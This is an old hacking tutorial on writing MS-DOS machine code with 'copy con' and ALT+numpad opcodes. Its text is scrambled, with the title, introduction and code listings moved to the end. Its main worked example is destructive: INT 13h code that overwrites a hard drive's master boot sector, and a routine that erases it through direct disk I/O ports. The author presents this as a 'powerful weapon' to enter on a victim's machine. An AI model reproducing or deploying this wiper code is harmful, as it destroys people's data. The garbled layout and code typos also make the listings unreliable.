|
|
|
|
|
What is 'extreme conditions' ? When you are sitting in front of a
computer with only MS-DOS installed without any compilers, hex editors, shells,
debuggers and you need to recover lost data, delete virus, or write a new one.
This is an extreme conditions. Most of programmers won't be able to do anything,
most of administrators think that this computer is 100% secured.
I have chosen pure MS-DOS as the operation system to program for
because in some version of Windows there are many things that
will easier this task (e.g. in Windows 98 there is-built in browser
with VBScript and Java Script interpretators so you can easy
write a hex-editor and more).
This article will be interesting as for the beginners and experienced
hackers. Also I recommend it to programmers, administrators, and anybody
who wants to feel the hacking spirit, which now is disappearing with
the previous hackers generation.
THE BEGINNING
To read and understand this you will need this minimum:
the knowledge of Assembler, experience working with MS-DOS. Also you will
need the list of x86 instructions opcodes (you can find it here on Elf Qrin
Hacking Labs), ASCII table, and lot of free time.
First of all, we need some kind of text editor. But the
administrator removed EVERYTHING that could help us. There is only one
thing that differs a good hacker from any other hacker - It's the deep
knowledge of everything he works with. If works with DOS he knows
everything about it. There is undocumented functions that opens
a tiny text editor, but that's enough. Enter this DOS command:
C:\copy con test.com
You will run the text editor. This is our instrument. But
we still don't know how to write binaries.
If you will look to official MS-DOS manual, you'll find the
answer. Using ALT key and the numeric keyboard you can create
binaries.
First of all check if the NUMlock on. Now press ALT, type 195,
now release ALT. To save file and exit press CTRL-Z and hit enter.
Now run it.
It doesn't do anything but it doesn't halt the system. If you
disassemble it you will find that test.com consists only of one
command RETN. As you already guessed opcode of RETN (195 == 0xC3), and in
decimal it is 195.
ADVANCED
Well, It was easy. Now try to enter this:
ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT 32 Hi,world!$
Than press CTRL-Z and hit enter. It is clear that this
program that prints "Hi,world!". Let's disassemble it:
I hope you know about the reversed order in machine word (Little/Big Endian: ALT-09
ALT-01 = 109). Also, in order to show the beauty of this method, I used
symbol '!' == 0x21 to call interrupt 0x21. So knowing ASCII codes can
easier your life. But why we need this symbol (20h == ALT-32 == " ") at
49E0:0108 ?
This is the main problem of this method. Using ALT and numeric
keyboard we cannot enter some symbols. Here is a list of them:
You will need to avoid this symbols. If you look at the code,
you'll see that the real offset is 0x108. After adding a symbol the
offset became 0x109. Actually there is more elegant way to do it:
One of the main problem is finding offset of variables and
labels. You can write program on the paper, giving to variables
symbolic names, and then the program will be ready it will be easy to
find necessary offsets and address.
Another possibility is declaring all variables before their
usage:
jmp short $+20 - reserves 20 bytes for the string. This method
could be also used for labels.
THE EXAMPLE
I think you are tired of these theoretical program and feel
ready to see this method in work ? As illustration we will try to create
a program that erases the boot sector. Attention! The usage of this program
in order to destroy information is a crime. You should use it only for experimental
purpose.
First of all, let's write it on assembler:
As you see we have one #0, one #3 and one #19. Let's modify
the program to avoid them:
It's quite a hard example. The assembler programming and
interrupts are not really the subject of this article. I can only
forward you to the other references that you can easily find in the
Internet.
That's all: enter this in victims machine and you have
powerful weapon. I recommend to use it very carefully.
Fortunately (or unfortunately, depends on readers
orientation), in BIOS there is a boot write protection (sometimes it's
called "Virus warning").It will block any efforts to modify the main
boot sector. That's more, there can be installed special software. For
example, running this program under Windows 98 operation system will
take no effect. But we still can work with hard drive I/O ports on a
low-level.
Here is an example of program that will erase main boot
sector, through hard drive I/O ports:
I don't know any popular protection that can track and block
that program. However, that doesn't refer to Windows NT, this OS
won't allow any program without necessary privileges to work with ports,
even more it will close the application's window!
Preparing this example for entering it using ALT and optimizing It's size I
will leave as an exercise to the readers.
ENDING
It's not easy. All this requires a lot of experience and talent
but gives you incredible power on machine. And i hope you won't be
using this power for destruction also I hope this article will be a step
"back to the real spirit of hacking".
Programming in extreme conditions
by Alexey Kalmykov (aka B52)
INTRODUCTION
But this won't stop the real hacker ...
(con stands for "console")
49E0:0100 start:
49E0:0100 B4 09 mov ah,9
49E0:0102 BA 0109 mov dx,offset data_1 ;
(49E0:0109='Hi !!!!')
49E0:0105 CD 21 int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
49E0:0107 C3 retn
49E0:0108 20 db 20h
49E0:0109 48 69 20 21 21 21 data_1 db 'Hi,world!$; xref 49E0:0102
0,3,6,8,16(0x10),19(0x13),27(0x1b),255(0xFF)
mov dx,109
dec sx
These two variants are equal (dec dx == 1 byte) and you chose
what suits you best.
mov ah,9
jmp sort $+20
db 'Hi,world!'$
mov dx,0x100+2+2; 0x100 - the base adress,2 - lengh of
; mov ah,9, 2 - lengh of jmp
B80103 mov ax,00301
B90100 mov cx,00001
BA8000 mov dx,00080
CD13 int 013
C3 retn
xor ax,ax
mov ds,ax
mov ax,00299
inc ax
inc ax
xor cx,cx
inc cx
mov dl,80
mov bx,13h*4
pushf
cli
push cs
call dword ptr [bx]
retn
mov dx, 1F2h
mov al,1
out dx,al
inc dx
out dx,al
inc dx
xor ax,ax
out dx,al
inc dx
out dx,al
mov al, 10100000b
inc dx
out dx,al
inc dx
mov al,30h
out dx,al
lea si, Buffer
mov dx, 1F0h
mov cx, 513
rep outsw